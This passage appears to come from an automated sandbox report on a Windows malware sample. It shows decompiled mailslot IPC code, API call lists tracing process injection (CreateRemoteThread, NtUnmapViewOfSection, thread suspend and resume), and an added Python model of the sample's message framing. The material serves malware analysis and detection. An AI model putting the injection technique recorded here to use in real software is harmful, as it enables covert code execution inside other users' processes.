                      • API ID: ErrorFileLastSleep$CloseCreateFreeHandleHeapWritememcpymemset
                      • String ID: \\.\mailslot\msl0
                      • API String ID: 990326202-622273203
                      • Opcode ID: 4bdae630b9fcbe0f8a23b9428ee12f3568433213e803cd86aea26540267a1728
                      • Instruction ID: 3a6e4c3a0fa27cd688e5fef70a244e9f952e20069a63f9e9082676df5e7f771b
                      • Opcode Fuzzy Hash: 4bdae630b9fcbe0f8a23b9428ee12f3568433213e803cd86aea26540267a1728
                      • Instruction Fuzzy Hash: 47314D75E00218ABDB15DFA5DD88A9EBBB8AF08354F104077F601BA2E0D7749A40CB59
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 293 401034-40105a CreateMailslotA 294 4010d6-4010df GetLastError 293->294 295 40105c-401066 call 4011f2 293->295 296 4010e2-4010e6 294->296 301 4010c4 295->301 302 401068-40107e ReadFile 295->302 298 4010f1-4010f8 296->298 299 4010e8-4010ee 296->299 299->298 305 4010cb-4010d4 CloseHandle 301->305 303 401080-40109c RtlReAllocateHeap 302->303 304 4010a4-4010b0 GetLastError 302->304 303->301 307 40109e-4010a2 303->307 304->305 306 4010b2 304->306 305->296 308 4010b5-4010c0 Sleep 306->308 307->308 308->302 309 4010c2 308->309 309->305
                      C-Code - Quality: 100%
                      			E00401034(void* _a4) {
                      				signed int _v8;
                      				long _v12;
                      				long _v16;
                      				void* _v20;
                      				void* _t24;
                      				long _t25;
                      				void* _t27;
                      				int _t32;
                      				long _t33;
                      				void* _t34;
                      				void* _t35;
                      				long _t36;
                      
                      				_t36 = 0;
                      				_v12 = 0x1000;
                      				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
                      				_v20 = _t24;
                      				if(_t24 == 0) {
                      					_t25 = GetLastError();
                      					_t35 = _a4;
                      					_v8 = _t25;
                      				} else {
                      					_t35 = E004011F2(0x1000);
                      					if(_t35 == 0) {
                      						L9:
                      						_v8 = 8;
                      					} else {
                      						do {
                      							_t32 = ReadFile(_v20, _t35 + _t36, 0x1000,  &_v16, 0); // executed
                      							if(_t32 == 0) {
                      								_t33 = GetLastError();
                      								_v8 = _t33;
                      								if(_t33 == 0x79) {
                      									_v16 = 0x1000;
                      									goto L7;
                      								}
                      							} else {
                      								_v12 = _v12 + 0x1000;
                      								_t36 = _t36 + _v16;
                      								_t34 = RtlReAllocateHeap( *0x40305c, 0, _t35, _v12); // executed
                      								_t35 = _t34;
                      								if(_t35 == 0) {
                      									goto L9;
                      								} else {
                      									_v8 = _v8 & 0x00000000;
                      									goto L7;
                      								}
                      							}
                      							goto L10;
                      							L7:
                      							Sleep(0x64); // executed
                      						} while (_v16 == 0x1000);
                      					}
                      					L10:
                      					CloseHandle(_v20);
                      				}
                      				if(_v8 == 0) {
                      					_t27 = _a4;
                      					 *(_t27 + 4) = _t35;
                      					 *((intOrPtr*)(_t27 + 8)) = _t36;
                      				}
                      				return _v8;
                      			}
                      Instruction addresses for the C code above, one per body line in order (0x00000000 marks a line with no instruction of its own): 0x0040103d 0x0040104c 0x0040104f 0x00401055 0x0040105a 0x004010d6 0x004010dc 0x004010df 0x0040105c 0x00401062 0x00401066 0x004010c4 0x004010c4 0x00401068 0x00401068 0x00401076 0x0040107e 0x004010a4 0x004010aa 0x004010b0 0x004010b2 0x00000000 0x004010b2 0x00401080 0x00401080 0x00401086 0x00401092 0x00401098 0x0040109c 0x00000000 0x0040109e 0x0040109e 0x00000000 0x0040109e 0x0040109c 0x00000000 0x004010b5 0x004010b7 0x004010bd 0x004010c2 0x004010cb 0x004010ce 0x004010ce 0x004010e6 0x004010e8 0x004010eb 0x004010ee 0x004010ee 0x004010f8

                      APIs
                      • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
                      • GetLastError.KERNEL32 ref: 004010D6
                        • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401553,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
                      • ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 00401076
                      • RtlReAllocateHeap.NTDLL(00000000,00000000,?), ref: 00401092
                      • GetLastError.KERNEL32 ref: 004010A4
                      • Sleep.KERNELBASE(00000064), ref: 004010B7
                      • CloseHandle.KERNEL32(?), ref: 004010CE
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: AllocateErrorHeapLast$CloseCreateFileHandleMailslotReadSleep
                      • String ID: \\.\mailslot\msl0
                      • API String ID: 3691270289-622273203
                      • Opcode ID: bb05a7b30b9f04e70e584028e2bcf9ee6f571bc0d10fb0b264c7aa77a4cc3123
                      • Instruction ID: d23dc2a85cadddd41d6abb100f9dc413ece9bb957419d815b73429d736441217
                      • Opcode Fuzzy Hash: bb05a7b30b9f04e70e584028e2bcf9ee6f571bc0d10fb0b264c7aa77a4cc3123
                      • Instruction Fuzzy Hash: 9D214A70D01358EBDB109F95CE88A9EBBB8FB44351F108076E641B22A0D7B48A84DA58
                      Uniqueness

                      Uniqueness Score: -1,00%
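                      The three decompiled functions above (E00401649, E004010FB and E00401034) form one IPC path. E00401649 starts two threads: E00401034 creates \\.\mailslot\msl0 with a 0x1000-byte maximum message size and a zero read timeout, so ReadFile fails immediately with ERROR_SEM_TIMEOUT (0x79) whenever no message is queued, and E004010FB retries CreateFileA while GetLastError is ERROR_FILE_NOT_FOUND (2), that is, until the reader has created the slot, then writes its buffer in 0x1000-byte messages with Sleep(0x64) between them. The two return codes the functions set themselves are ERROR_NOT_ENOUGH_MEMORY (8) on allocation failure and ERROR_BAD_FORMAT (0xb) when E0040172F fails. The reader stops at the first message shorter than 0x1000 bytes, so a payload whose length is a multiple of 0x1000 would never terminate it; the writer handles that by re-sending the last byte as a one-byte message, which leaves the reassembled buffer one byte longer than the original, with the final byte duplicated (the reader stores that length at offset 8 of its argument block). The Python below is an added model of that framing, not code from the report or the sample: an in-memory queue stands in for the mailslot (an assumption, since real mailslots are Windows-only, and only message ordering and the timeout-on-empty behaviour are modelled), and both loops are reproduced so the length behaviour and the timeout path can be checked without running the sample.

```python
from collections import deque

MAX_MSG = 0x1000            # CreateMailslotA nMaxMessageSize and the per-ReadFile size in the sample
ERROR_FILE_NOT_FOUND = 0x2  # the writer retries CreateFileA while it sees this
ERROR_SEM_TIMEOUT = 0x79    # ReadFile on an empty mailslot whose lReadTimeout is 0
POLL_MS = 100               # Sleep(0x64) between iterations on both sides


class MailslotSim:
    """In-memory stand-in for \\\\.\\mailslot\\msl0 (assumption: message semantics only).

    Messages are delivered whole and in order; a read on an empty slot fails at
    once with ERROR_SEM_TIMEOUT, which is how a zero read timeout behaves.
    """

    def __init__(self):
        self._q = deque()

    def write(self, data: bytes) -> None:
        self._q.append(bytes(data))

    def read(self):
        if not self._q:
            return None, ERROR_SEM_TIMEOUT
        return self._q.popleft(), 0


def write_stream(slot: MailslotSim, payload: bytes) -> int:
    """Writer loop of E004010FB. Returns the number of messages written."""
    offset, remaining, sent = 0, len(payload), 0
    while True:  # the original is a do/while, so an empty payload still sends one empty message
        n = min(remaining, MAX_MSG)
        slot.write(payload[offset:offset + n])
        sent += 1
        offset += n
        remaining -= n
        # A final full-size message would leave the reader waiting for more, so the
        # last byte is re-sent on its own: that message is short and ends the read loop.
        if remaining == 0 and n == MAX_MSG:
            remaining = 1
            offset -= 1
        if remaining == 0:
            break
        # the sample calls Sleep(POLL_MS) here before the next WriteFile
    return sent


def read_stream(slot: MailslotSim, max_polls: int = 50):
    """Reader loop of E00401034. Returns (buffer, last error).

    Keeps reading while each message is exactly MAX_MSG bytes; a timeout only
    means nothing is queued yet. max_polls is an added guard: the sample polls
    forever, POLL_MS apart.
    """
    buf = bytearray()
    err = 0
    polls = 0
    while True:
        msg, err = slot.read()
        if msg is None:
            if err != ERROR_SEM_TIMEOUT:
                break           # any other error ends the loop with that code
            polls += 1
            if polls >= max_polls:
                break
            continue            # the sample calls Sleep(POLL_MS) and retries
        buf += msg
        if len(msg) != MAX_MSG:  # short message: end of stream
            break
    return bytes(buf), err


def round_trip(payload: bytes):
    """Write then read through one simulated slot; returns (messages sent, received, err)."""
    slot = MailslotSim()
    sent = write_stream(slot, payload)
    received, err = read_stream(slot)
    return sent, received, err


if __name__ == "__main__":
    for size in (0x1400, 0x2000):
        sent, got, err = round_trip(bytes(range(256)) * (size // 256))
        print(f"payload {size:#x}: {sent} messages, received {len(got):#x} bytes, err {err:#x}")
```

                      The second case in the usage loop is the one to remember when reconstructing traffic from this sample: a payload of exactly 0x2000 bytes arrives as 0x2001 bytes with its last byte repeated, so a length recorded by the reader is not the length the writer started from.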

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 310 1411227-1411258 PathFindFileNameW lstrcmpiW 311 141130f 310->311 312 141125e-1411264 310->312 313 1411312-1411319 311->313 314 1411266 312->314 315 141126b-1411289 RegOpenKeyExA 312->315 314->315 315->313 316 141128f-14112b7 lstrlenW RtlAllocateHeap 315->316 317 1411304-141130d RegCloseKey 316->317 318 14112b9-14112d4 RegQueryValueExW 316->318 317->313 319 14112f6-14112fe HeapFree 318->319 320 14112d6-14112f1 StrStrIW 318->320 319->317 320->319 321 14112f3 320->321 321->319
                      APIs
                      • PathFindFileNameW.SHLWAPI(0141618C), ref: 01411249
                      • lstrcmpiW.KERNELBASE(00000000,?,01417614), ref: 01411250
                      • RegOpenKeyExA.KERNEL32(80000001,01418080,00000000,00000000,?,?,01417614), ref: 01411281
                      • lstrlenW.KERNEL32(?,01417614), ref: 01411295
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 014112AD
                      • RegQueryValueExW.KERNEL32(?,00000000,01417614,00000000,01417614,?,01417614), ref: 014112CC
                      • StrStrIW.SHLWAPI(00000000), ref: 014112E9
                      • HeapFree.KERNEL32(00000000,00000000), ref: 014112FE
                      • RegCloseKey.ADVAPI32(?,?,01417614), ref: 01411307
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Heap$AllocateCloseFileFindFreeNameOpenPathQueryValuelstrcmpilstrlen
                      • String ID:
                      • API String ID: 2182914722-0
                      • Opcode ID: 2615739f57e1c7dd366f42f7b62813eef064ab7a2dab6edf1fdb85b0734d3672
                      • Instruction ID: 447544d0db6d1a43a516fc81799659135e733b00f809b3ae3278da579e56540d
                      • Opcode Fuzzy Hash: 2615739f57e1c7dd366f42f7b62813eef064ab7a2dab6edf1fdb85b0734d3672
                      • Instruction Fuzzy Hash: 70214FB1900118ABDB319FB9ED48DAF7FB8FF44751B014169FA09E2139D7718900DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 322 141144f-1411466 LoadLibraryA 323 14114b4-14114b9 322->323 324 1411468-141147c 322->324 326 14114b2-14114b3 324->326 327 141147e-1411491 GetModuleHandleA 324->327 326->323 327->326 329 1411493-141149e FindWindowA 327->329 329->326 330 14114a0-14114a9 GetWindowThreadProcessId 329->330 330->326 331 14114ab 330->331 331->326
                      APIs
                      • LoadLibraryA.KERNEL32(USER32.DLL), ref: 0141145E
                      • GetModuleHandleA.KERNEL32(USER32.DLL,01418000,?,?,0141178B,00000000,?,01417614), ref: 01411484
                      • FindWindowA.USER32(01418640,00000000,?,?,0141178B,00000000,?,01417614), ref: 0141149A
                      • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,0141178B,00000000,?,01417614), ref: 014114A5
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Window$FindHandleLibraryLoadModuleProcessThread
                      • String ID: USER32.DLL$pnls$pnls
                      • API String ID: 108827374-1300720345
                      • Opcode ID: 2103aea1732094da0d14978e3bb98340fb0d1ba6ef537523181818fc2bbeb894
                      • Instruction ID: 0ffd90f4e35c2118bde5c53d06c020b43ad4d2d05c0e7164593883a5f90cb31d
                      • Opcode Fuzzy Hash: 2103aea1732094da0d14978e3bb98340fb0d1ba6ef537523181818fc2bbeb894
                      • Instruction Fuzzy Hash: CDF0C8B1A40716B7EB3087F98C45F6F7ABC9B04D50B25412BAB01E3168DBB8ED00466C
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 332 1414365-14143a6 lstrcpyn 333 14143aa-14143af 332->333 334 14143b1-14143b7 333->334 335 14143bb-14143bf 333->335 334->335 338 14143b9 334->338 336 14143c1-14143c3 335->336 337 14143c5-14143c7 335->337 336->333 336->337 339 1414482 337->339 340 14143cd-14143d2 337->340 338->335 343 1414489-1414490 339->343 341 1414479-1414480 340->341 342 14143d8-14143dc 340->342 341->343 342->341 344 14143e2-1414410 VirtualAlloc 342->344 345 1414470-1414477 344->345 346 1414412-1414446 call 1414b60 344->346 345->343 349 1414459 346->349 350 1414448-1414457 memcpy 346->350 351 1414460-141446e VirtualFree 349->351 350->351 351->343
                      APIs
                      • lstrcpyn.KERNEL32(014116FE,014161F4,00000008,0141618C,0000000C,00000000,?,?,?,014116FE,?,?,01417614), ref: 01414393
                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,014116FE,?,?,01417614), ref: 01414406
                      • memcpy.NTDLL(?,00000000,?,?,01417614,00000001,?,?,?,014116FE,?,?,01417614), ref: 0141444F
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,01417614,00000001,?,?,?,014116FE,?), ref: 01414468
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Virtual$AllocFreelstrcpynmemcpy
                      • String ID: Feb 28 2019$pnls$pnls
                      • API String ID: 2133416149-3706025122
                      • Opcode ID: 0c9b5da5f0e00675f502cb655fad11273fb5ddede5de0edad8976e6b699494d9
                      • Instruction ID: 1c15b49dd5952824ab879ea8a7b6c64d44dbd2e47bced3908488e2d70e992cf2
                      • Opcode Fuzzy Hash: 0c9b5da5f0e00675f502cb655fad11273fb5ddede5de0edad8976e6b699494d9
                      • Instruction Fuzzy Hash: 3631B275A402159BDF14CF98C884BAFBBB5FF44714F19805ADA01AB36AC7B0E545CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      APIs
                      • OpenProcessToken.ADVAPI32(000000FF,00020008,01417614,00000000), ref: 01413E38
                      • GetTokenInformation.KERNELBASE(01417614,00000014,00000001,00000004,?,00000000), ref: 01413E58
                      • GetTokenInformation.KERNELBASE(01417614,00000019,00000000,00000000,?), ref: 01413E68
                      • CloseHandle.KERNEL32(01417614), ref: 01413EB8
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • GetTokenInformation.KERNELBASE(01417614,00000019,00000000,?,?,?,0141618C), ref: 01413E8B
                      • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01413E93
                      • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01413EA3
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Token$Information$AuthorityHeap$AllocateCloseCountFreeHandleOpenProcess
                      • String ID:
                      • API String ID: 1097422675-0
                      • Opcode ID: 277b92339f37649408ddb98e946438f65151c558f4b5935c2a96f656c57d8d34
                      • Instruction ID: 53997217784cedd03e21994b30bebe3f09bc653eaaa94c5a9e1b67890d364957
                      • Opcode Fuzzy Hash: 277b92339f37649408ddb98e946438f65151c558f4b5935c2a96f656c57d8d34
                      • Instruction Fuzzy Hash: E3213CB5900209FFEB11DFA4DC44EAEBFB9FB48314F0000A6EA11A6265C7719A04EF60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      APIs
                      • InterlockedIncrement.KERNEL32(014175C8), ref: 014110B3
                      • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 014110C8
                        • Part of subcall function 01411000: memcpy.NTDLL(014176E0,?,0000000C,01416240,0000000C,014110EC,?,00000000,?), ref: 0141103B
                      • CreateThread.KERNELBASE(00000000,00000000,Function_0000005E,00000000,?,00000000), ref: 014110F4
                      • InterlockedDecrement.KERNEL32(014175C8), ref: 0141110C
                      • SleepEx.KERNEL32(00000064,00000001), ref: 01411128
                      • CloseHandle.KERNEL32 ref: 01411144
                      • HeapDestroy.KERNEL32 ref: 01411151
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThreadmemcpy
                      • String ID:
                      • API String ID: 820571241-0
                      • Opcode ID: fca41bc9b628efff89ca9da96281f401bafb523817cb9c0bb511dcfa355902c6
                      • Instruction ID: 2992ad1b0e43e0ead2cf6d0d02c43db8c74542208ee49da562079a1d50f45c2d
                      • Opcode Fuzzy Hash: fca41bc9b628efff89ca9da96281f401bafb523817cb9c0bb511dcfa355902c6
                      • Instruction Fuzzy Hash: D3116075601254AFDB319F39EC48A5BBFA9FB0AEA1B114026F70AC163CC7B194008B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      C-Code - Quality: 96%
                      			E00401033(void* _a4) {
                      				signed int _v8;
                      				long _v12;
                      				long _v16;
                      				void* _v20;
                      				void* _t24;
                      				long _t25;
                      				void* _t27;
                      				int _t32;
                      				long _t33;
                      				void* _t34;
                      				void* _t36;
                      				long _t39;
                      
                      				_pop(_t41);
                      				_t39 = 0;
                      				_v8 = 0x1000;
                      				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
                      				_v16 = _t24;
                      				if(_t24 == 0) {
                      					_t25 = GetLastError();
                      					_t36 = _a4;
                      					_v8 = _t25;
                      				} else {
                      					_t36 = E004011F2(0x1000);
                      					if(_t36 == 0) {
                      						L10:
                      						_v8 = 8;
                      					} else {
                      						do {
                      							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
                      							if(_t32 == 0) {
                      								_t33 = GetLastError();
                      								_v8 = _t33;
                      								if(_t33 == 0x79) {
                      									_v16 = 0x1000;
                      									goto L8;
                      								}
                      							} else {
                      								_v12 = _v12 + 0x1000;
                      								_t39 = _t39 + _v16;
                      								_t34 = RtlReAllocateHeap( *0x40305c, 0, _t36, _v12); // executed
                      								_t36 = _t34;
                      								if(_t36 == 0) {
                      									goto L10;
                      								} else {
                      									_v8 = _v8 & 0x00000000;
                      									goto L8;
                      								}
                      							}
                      							goto L11;
                      							L8:
                      							Sleep(0x64); // executed
                      						} while (_v16 == 0x1000);
                      					}
                      					L11:
                      					CloseHandle(_v20);
                      				}
                      				if(_v8 == 0) {
                      					_t27 = _a4;
                      					 *(_t27 + 4) = _t36;
                      					 *((intOrPtr*)(_t27 + 8)) = _t39;
                      				}
                      				return _v8;
                      			}

                      APIs
                      • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
                      • GetLastError.KERNEL32 ref: 004010D6
                        • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401553,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
                      • ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 00401076
                      • RtlReAllocateHeap.NTDLL(00000000,00000000,?), ref: 00401092
                      • GetLastError.KERNEL32 ref: 004010A4
                      • Sleep.KERNELBASE(00000064), ref: 004010B7
                      • CloseHandle.KERNEL32(?), ref: 004010CE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp
• Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp
• Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: AllocateErrorHeapLast$CloseCreateFileHandleMailslotReadSleep
                      • String ID: \\.\mailslot\msl0
                      • API String ID: 3691270289-622273203
                      • Opcode ID: d83491b128b874970635f2c91288b0718e6b26e4eb36ae321374187c494f20b3
                      • Instruction ID: 301bfff34d3d9a42d24819e7bb6be00bc8a8a456f07860fe6218443ba64bb720
                      • Opcode Fuzzy Hash: d83491b128b874970635f2c91288b0718e6b26e4eb36ae321374187c494f20b3
                      • Instruction Fuzzy Hash: D3116A31901358ABDB219F95CD88BAFBBB8FB44750F108077F640B21E0D7B48980CA68
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      APIs
                      • CreateFileW.KERNELBASE(0141763C,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01411611
                      • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01417614), ref: 01411627
                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01417614), ref: 0141163F
                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01417614), ref: 01411651
                      • GetLastError.KERNEL32(?,00000000,?,01417614), ref: 0141165F
                      • GetLastError.KERNEL32(?,00000000,?,01417614), ref: 0141166C
                      • GetLastError.KERNEL32(?,01417614), ref: 0141167B
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$ErrorLast$Create$MappingSizeView
                      • String ID:
                      • API String ID: 2408169653-0
                      • Opcode ID: ab2bceceaa55479acf8b6edb4093f3c7ae4f7b24588e43e182be8b63ac91f9b7
                      • Instruction ID: e5a608559401c5aea47ddef825109968de701d14c89a0daa7b3ff9979d0a7aab
                      • Opcode Fuzzy Hash: ab2bceceaa55479acf8b6edb4093f3c7ae4f7b24588e43e182be8b63ac91f9b7
                      • Instruction Fuzzy Hash: 890125B1502220BBD2309B759C4CE6B7F7DDF47AB1F160915FA0E92268D5718845C7B0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 01412282
                        • Part of subcall function 01413223: OpenProcess.KERNEL32(00000400,00000000,01417614,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141323E
                        • Part of subcall function 01413223: IsWow64Process.KERNELBASE(01417624,?,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141324F
                        • Part of subcall function 01413223: CloseHandle.KERNEL32(01417624), ref: 01413262
                        • Part of subcall function 01413CB2: NtReadVirtualMemory.NTDLL(?,00000004,0141244E,0141244E,00000000,00000000,?,014122DE,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C), ref: 01413CD0
                        • Part of subcall function 01413CB2: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01413CDF
                        • Part of subcall function 01413CB2: SetLastError.KERNEL32(00000000,?,014122DE,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 01413CE6
                      • ResumeThread.KERNELBASE(?), ref: 014123A5
                        • Part of subcall function 0141199F: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,014122FD,00000000,0141244E,CCCCFEEB,00000000,0141244E), ref: 014119BC
                        • Part of subcall function 0141199F: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,0141244E,00000004,?,?,?,?,014122FD,00000000,0141244E), ref: 014119F0
                      • ResumeThread.KERNELBASE(?,00000000,0141244E,CCCCFEEB,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 0141230D
                      • WaitForSingleObject.KERNEL32(00000064), ref: 0141231B
                      • SuspendThread.KERNELBASE(?), ref: 0141232E
                        • Part of subcall function 01413C91: RtlNtStatusToDosError.NTDLL(00000000), ref: 01413CA9
                        • Part of subcall function 01412102: memset.NTDLL ref: 01412130
                        • Part of subcall function 01412102: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 014121BA
                        • Part of subcall function 01412102: WaitForSingleObject.KERNEL32(00000064), ref: 014121C8
                        • Part of subcall function 01412102: SuspendThread.KERNEL32(?), ref: 014121DB
                        • Part of subcall function 01411C29: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01412386,?,01412386,01412386,?,?,?,?,00000000), ref: 01411D5F
                        • Part of subcall function 01411C29: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01412386,?,01412386,01412386,?,?,?,?,00000000), ref: 01411DB0
                        • Part of subcall function 01411C29: memcpy.NTDLL(?,01412486,00000800,?,?,?,00000000), ref: 01411E20
                        • Part of subcall function 01411C29: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01411E4B
                        • Part of subcall function 01411C29: RtlNtStatusToDosError.NTDLL(00000000), ref: 01411E52
                        • Part of subcall function 01411C29: CloseHandle.KERNEL32(00000000), ref: 01411E61
                        • Part of subcall function 01411C29: memset.NTDLL ref: 01411E75
                      • GetLastError.KERNEL32(00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 0141239A
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: ErrorThread$ResumeStatusVirtualmemcpymemset$CloseHandleLastObjectProcessProtectSingleSuspendWait$MemoryOpenReadSectionUnmapViewWow64
                      • String ID:
                      • API String ID: 1182286539-0
                      • Opcode ID: 5fd7ffdd7abc41383f3abd0d3651c02ab562437bce824dd9e27707973112b622
                      • Instruction ID: aabfffdcbe371b315c85228dd6327157fd71e93933947d6cd7ccae43e36fa16b
                      • Opcode Fuzzy Hash: 5fd7ffdd7abc41383f3abd0d3651c02ab562437bce824dd9e27707973112b622
                      • Instruction Fuzzy Hash: 4931FF72800129BBDF21AF69CC44EDEBB79FF04360F118566EA18E6264D7B0DA41CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 01413223: OpenProcess.KERNEL32(00000400,00000000,01417614,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141323E
                        • Part of subcall function 01413223: IsWow64Process.KERNELBASE(01417624,?,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141324F
                        • Part of subcall function 01413223: CloseHandle.KERNEL32(01417624), ref: 01413262
                      • OpenProcess.KERNEL32(001F0FFF,00000000,0141155F,0141155F,C000009A,01417614,00000000,?,?,0141155F,?,00000000,?,01417614), ref: 014123DF
                      • CreateRemoteThread.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,0141155F,?,00000000,?,01417614), ref: 01412439
                      • GetLastError.KERNEL32(?,?,0141155F,?,00000000,?,01417614), ref: 0141245B
                        • Part of subcall function 0141225F: memset.NTDLL ref: 01412282
                        • Part of subcall function 0141225F: ResumeThread.KERNELBASE(?,00000000,0141244E,CCCCFEEB,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 0141230D
                        • Part of subcall function 0141225F: WaitForSingleObject.KERNEL32(00000064), ref: 0141231B
                        • Part of subcall function 0141225F: SuspendThread.KERNELBASE(?), ref: 0141232E
                        • Part of subcall function 0141225F: GetLastError.KERNEL32(00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 0141239A
                        • Part of subcall function 0141225F: ResumeThread.KERNELBASE(?), ref: 014123A5
                      • CloseHandle.KERNEL32(0141155F), ref: 01412453
                      • CloseHandle.KERNEL32(?), ref: 0141246D
                      • GetLastError.KERNEL32(?,?,0141155F,?,00000000,?,01417614), ref: 01412475
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Thread$CloseErrorHandleLastProcess$OpenResume$CreateObjectRemoteSingleSuspendWaitWow64memset
                      • String ID:
                      • API String ID: 1305399161-0
                      • Opcode ID: f5875bc7edfb608e604b81ebb6ba83a380246854cebbd40151e47695b0432c30
                      • Instruction ID: 65411e031ce57f4a6e16dfa4ed0ae6e7522ef67508750cb921054349baaae94a
                      • Opcode Fuzzy Hash: f5875bc7edfb608e604b81ebb6ba83a380246854cebbd40151e47695b0432c30
